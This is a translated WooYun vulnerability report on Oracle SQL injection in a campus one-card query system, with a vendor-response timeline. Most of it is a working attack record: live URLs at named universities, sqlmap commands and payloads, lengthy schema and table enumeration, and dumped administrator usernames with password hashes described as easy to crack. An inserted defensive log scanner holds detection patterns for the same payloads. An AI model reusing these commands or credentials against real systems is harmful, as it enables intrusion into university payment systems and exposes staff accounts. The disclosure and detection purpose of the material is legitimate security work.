
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-042821

Title: Oracle SQL injection in a widely deployed campus one-card (ecard) query system

Vendor: 哈尔滨新中新电子股份有限公司 (Harbin Synjones Electronics Co., Ltd.)

Author: 路人甲

Submitted: 2013-11-14 11:20

Fix time: 2014-02-12 11:20

Public disclosure: 2014-02-12 11:20

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 8

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help please contact [email protected]



Vulnerability details

Disclosure status:

2013-11-14: Details sent to the vendor, awaiting vendor action
2013-11-18: Vendor confirmed; details visible to the vendor only
2013-11-21: Details opened to third-party security partners
2014-01-12: Details opened to core white hats and domain experts
2014-01-22: Details opened to regular white hats
2014-02-01: Details opened to intern white hats
2014-02-12: Details opened to the public

Brief description:

I saw a vulnerability someone had submitted to WooYun earlier; when I tested it, it no longer worked, so I looked for other pages that could be injected. Does this count as a duplicate?

Detailed description:

I tested several schools, e.g. Nankai University, Shandong University and Ludong University, and all of them are affected:
http://ecard.nankai.edu.cn/getfjnr.action?fjid=8ae48a8a254e6f8101254ea07c2d0003
http://ecard.sdu.edu.cn/getfjnr.action?fjid=53d6b6923cff8518013f5f2b4b59000b
http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009
Running sqlmap against it:
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 --dbs --threads=10
---
Place: GET
Parameter: fbxxid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5509=5509 AND 'wHAE'='wHAE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5921=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(86)||CHR(119)||CHR(81),5) AND 'MIyn'='MIyn
---
[10:05:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:25:12] [INFO] fetching database (schema) names
[10:25:12] [INFO] fetching number of databases
[10:25:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:25:12] [INFO] retrieved:
[10:25:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
16
[10:26:33] [INFO] retrieved: CTXSYS
[10:31:52] [INFO] retrieved: DBSNMP
[10:38:03] [INFO] retrieved: DMSYS
[10:43:20] [INFO] retrieved: EXFSYS
[10:48:51] [INFO] retrieved: IDDBUSER
[10:56:14] [INFO] retrieved: MDSYS
[11:01:27] [INFO] retrieved: OLAPSYS
[11:09:45] [INFO] retrieved: ORDSYS
[11:17:23] [INFO] retrieved: OUTLN
[11:23:48] [INFO] retrieved: SCHOOL
[11:29:42] [INFO] retrieved: SYS
[11:32:43] [INFO] retrieved: SYSMAN
[11:38:29] [INFO] retrieved: SYSTEM
[11:44:00] [INFO] retrieved: TSMSYS
[11:50:12] [INFO] retrieved: WMSYS
[11:55:51] [INFO] retrieved: XDB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] IDDBUSER
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCHOOL
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 -D SCHOOL --tables --threads=10
---
Place: GET
Parameter: fjid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fjid=4a42b0f33381c4f90133d498614e0009' AND 5975=5975 AND 'wecX'='wecX
---
[12:00:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:00:50] [INFO] fetching tables for database: 'SCHOOL'
[12:00:50] [INFO] fetching number of tables for database 'SCHOOL'
[12:00:50] [INFO] retrieved:
[12:00:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
112
[12:02:36] [INFO] retrieving the length of query output
[12:02:36] [INFO] retrieved: 10
[12:06:06] [INFO] retrieved: IBIB"__HJH 9/10 (90%)
[12:06:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:06:41] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[12:06:56] [INFO] retrieved: IBIB"_PHJH
[12:06:56] [INFO] retrieving the length of query output
[12:06:56] [INFO] retrieved: 12
[12:11:07] [INFO] retrieved: BATEWADRDBRB
[12:11:07] [INFO] retrieving the length of query output
[12:11:07] [INFO] retrieved: 13
[12:16:33] [INFO] retrieved: FARBRAXXPBDQX
[12:16:33] [INFO] retrieving the length of query output
[12:16:33] [INFO] retrieved: 13
[12:22:19] [INFO] retrieved: BAREWAYTLI@@K
[12:22:19] [INFO] retrieving the length of query output
[12:22:19] [INFO] retrieved: 11
[12:25:57] [INFO] retrieved: GATETAX_NOS
[12:25:57] [INFO] retrieving the length of query output
[12:25:57] [INFO] retrieved: 5
[12:29:07] [INFO] retrieved: GTRJN
[12:29:07] [INFO] retrieving the length of query output
[12:29:07] [INFO] retrieved: 10
[12:32:57] [INFO] retrieved: HISACCOUNT
[12:32:57] [INFO] retrieving the length of query output
[12:32:57] [INFO] retrieved: 13
[12:38:01] [INFO] retrieved: MLOG$_ACCOUNT
[12:38:01] [INFO] retrieving the length of query output
[12:38:01] [INFO] retrieved: 13
[12:42:20] [INFO] retrieved: MLOG$_MERCACC
[12:42:20] [INFO] retrieving the length of query output
[12:42:20] [INFO] retrieved: 8
[12:46:47] [INFO] retrieved: _PE_INF_ 5/8 (63%)
[12:47:53] [INFO] retrieved: OPENINFO
[12:47:53] [INFO] retrieving the length of query output
[12:47:53] [INFO] retrieved: 8
[12:52:09] [INFO] retrieved: OPERATOR
[12:52:09] [INFO] retrieving the length of query output
[12:52:09] [INFO] retrieved: 15
[12:57:49] [INFO] retrieved: OPERFEEITEM_OLD
[12:57:49] [INFO] retrieving the length of query output
[12:57:49] [INFO] retrieved: 7
[13:01:26] [INFO] retrieved: OPERLOG
[13:01:26] [INFO] retrieving the length of query output
[13:01:26] [INFO] retrieved: 8
[13:04:46] [INFO] retrieved: OPERPART
[13:04:46] [INFO] retrieving the length of query output
[13:04:46] [INFO] retrieved: 7
[13:07:20] [INFO] retrieved: HISTRJN
[13:07:20] [INFO] retrieving the length of query output
[13:07:20] [INFO] retrieved: 5
[13:10:15] [INFO] retrieved: UTRJN
[13:10:15] [INFO] retrieving the length of query output
[13:10:15] [INFO] retrieved: 13
[13:15:51] [INFO] retrieved: WEBTRJNREPORT
[13:15:51] [INFO] retrieving the length of query output
[13:15:51] [INFO] retrieved: 18
[13:21:32] [INFO] retrieved: WEB_COMPARE_RESULT
[13:21:32] [INFO] retrieving the length of query output
[13:21:32] [INFO] retrieved: 9
[13:24:36] [INFO] retrieved: _EB_FB___ 4/9 (44%)
[13:24:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:26:24] [INFO] retrieved: WEB_FBXXB
[13:26:24] [INFO] retrieving the length of query output
[13:26:24] [INFO] retrieved: 8
[13:29:12] [INFO] retrieved: WEB_FTPB
[13:29:12] [INFO] retrieving the length of query output
[13:29:12] [INFO] retrieved: 8
[13:31:46] [INFO] retrieved: WEB____J 4/8 (50%)
[13:31:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:32:14] [INFO] retrieved: WEB_XXFJ
[13:32:14] [INFO] retrieving the length of query output
[13:32:14] [INFO] retrieved: 8
[13:34:45] [INFO] retrieved: WEB_XXLM
[13:34:45] [INFO] retrieving the length of query output
[13:34:45] [INFO] retrieved: 12
[13:37:40] [INFO] retrieved: W_OP_MERCACC
[13:37:40] [INFO] retrieving the length of query output
[13:37:40] [INFO] retrieved: 8
[13:40:29] [INFO] retrieved: HISGTRJN
[13:40:29] [INFO] retrieving the length of query output
[13:40:29] [INFO] retrieved: 14
[13:44:15] [INFO] retrieved: W_OP_ORDERINFO
[13:44:15] [INFO] retrieving the length of query output
[13:44:15] [INFO] retrieved: 15
[13:47:41] [INFO] retrieved: W_THIRD_MESSAGE
[13:47:41] [INFO] retrieving the length of query output
[13:47:41] [INFO] retrieved: 5
[13:50:10] [INFO] retrieved: XFZKL
[13:50:10] [INFO] retrieving the length of query output
[13:50:10] [INFO] retrieved: 4
[13:50:55] [INFO] retrieved: ____
[13:51:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:52:45] [INFO] retrieved: ZBHD
[13:52:45] [INFO] retrieving the length of query output
[13:52:45] [INFO] retrieved: 2
[13:55:18] [INFO] retrieved: ZH
[13:55:18] [INFO] retrieving the length of query output
[13:55:18] [INFO] retrieved: 6
[13:57:46] [INFO] retrieved: ZKZYDY
[13:57:46] [INFO] retrieving the length of query output
[13:57:46] [INFO] retrieved: 6
[13:58:54] [INFO] retrieved: ______
[13:59:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[14:00:35] [INFO] retrieved: ZXYHKK
[14:00:35] [INFO] retrieving the length of query output
[14:00:35] [INFO] retrieved: 4
[14:02:19] [INFO] retrieved: KMRJ
[14:02:19] [INFO] retrieving the length of query output
[14:02:19] [INFO] retrieved: 3
[14:04:36] [INFO] retrieved: LOG
[14:04:36] [INFO] retrieving the length of query output
[14:04:36] [INFO] retrieved: 5
[14:06:45] [INFO] retrieved: LSHZB
[14:06:45] [INFO] retrieving the length of query output
[14:06:45] [INFO] retrieved: 7
[14:08:45] [INFO] retrieved: MERCACC
[14:08:45] [INFO] retrieving the length of query output
[14:08:45] [INFO] retrieved: 7
[14:10:52] [INFO] retrieved: MESSAGE
[14:10:52] [INFO] retrieving the length of query output
[14:10:52] [INFO] retrieved: 8
[14:13:13] [INFO] retrieved: MHISTRJN
[14:13:13] [INFO] retrieving the length of query output
[14:13:13] [INFO] retrieved: 5
[14:15:16] [INFO] retrieved: NTRJN
[14:15:16] [INFO] retrieving the length of query output
[14:15:16] [INFO] retrieved: 11
[14:17:56] [INFO] retrieved: OPERFEEITEM
[14:17:56] [INFO] retrieving the length of query output
[14:17:56] [INFO] retrieved: 8
[14:20:17] [INFO] retrieved: OPERTEAM
[14:20:17] [INFO] retrieving the length of query output
[14:20:17] [INFO] retrieved: 11
[14:23:02] [INFO] retrieved: PURSECONFIG
[14:23:02] [INFO] retrieving the length of query output
[14:23:02] [INFO] retrieved: 4
[14:24:26] [INFO] retrieved: QQAA
...
There are quite a few tables, so I did not keep going.
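From the defender's side, the two sqlmap techniques that fired above (a boolean-based tautology and an Oracle DBMS_PIPE.RECEIVE_MESSAGE time delay) leave a recognisable shape in web server access logs. The scanner below is an added example, not code from the report or the vendor; the log lines, client addresses and request path are constructed for illustration.

```python
"""Flag blind SQL injection probes of the kind shown in this report in access logs."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (not real traffic); the second and
# third mirror the boolean-based and time-based payload shapes from the sqlmap run.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Nov/2013:10:05:35 +0800] "GET /getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 HTTP/1.1" 200 5120
10.0.0.9 - - [14/Nov/2013:10:05:36 +0800] "GET /getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009%27%20AND%205975%3D5975%20AND%20%27wecX%27%3D%27wecX HTTP/1.1" 200 5120
10.0.0.9 - - [14/Nov/2013:10:05:37 +0800] "GET /getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009%27%20AND%205921%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2886%29%2C5%29%20AND%20%27MIyn%27%3D%27MIyn HTTP/1.1" 200 5120
"""

# client - - [timestamp] "METHOD target protocol" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signatures for the two techniques sqlmap reported against this application.
SIGNATURES = {
    "boolean-based tautology": re.compile(r"'\s*AND\s+(\d+)=\1\b", re.I),
    "oracle time-based (DBMS_PIPE)": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
}


def scan_log(text):
    """Return (client_ip, parameter, technique) for every request that matches a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, _ts, _method, target, _status = m.groups()
        # parse_qsl percent-decodes each value once, so the regexes see the raw payload
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for technique, rx in SIGNATURES.items():
                if rx.search(value):
                    hits.append((ip, name, technique))
    return hits


def suspicious_sources(hits):
    """Count hits per (client, parameter): blind extraction needs thousands of such requests."""
    counts = {}
    for ip, param, _technique in hits:
        counts[(ip, param)] = counts.get((ip, param), 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A single match from a user can be a typo; a stream of matches on one parameter from one client, at the request rate a blind extraction needs, is the pattern worth alerting on.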

Proof of vulnerability:

Of these, IDDBUSER and SCHOOL are the two schemas that matter most for the card system; here I picked the M_MANAGER table in IDDBUSER:
Database: IDDBUSER
Table: N_MANAGER
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ID | NUMBER |
| PASSWD | VARCHAR2 |
| STATUS | VARCHAR2 |
| UNITNAME | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
These are the site administrators' usernames and passwords. I did not manage to look up the hash values... but passwords cannot be longer than 6 characters, so they should be fairly easy to crack.
Database: IDDBUSER
Table: N_MANAGER
[5 entries]
+------------------+------------+
| PASSWD | USERNAME |
+------------------+------------+
| F41A476D82451862 | WEBMANAGER |
| F41A476D82451862 | sdxxb |
| C51D59C23143C4D9 | mll |
| A6CF2E03D025DB06 | zhy |
| NULL | NULL |
+------------------+------------+

Fix recommendation:

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2013-11-18 22:06

Vendor reply:

This vulnerability was already submitted by a white hat early this year. CNVD reproduced the described case and forwarded it to the relevant emergency response organization of the education network (CERNET).

Latest status:

None yet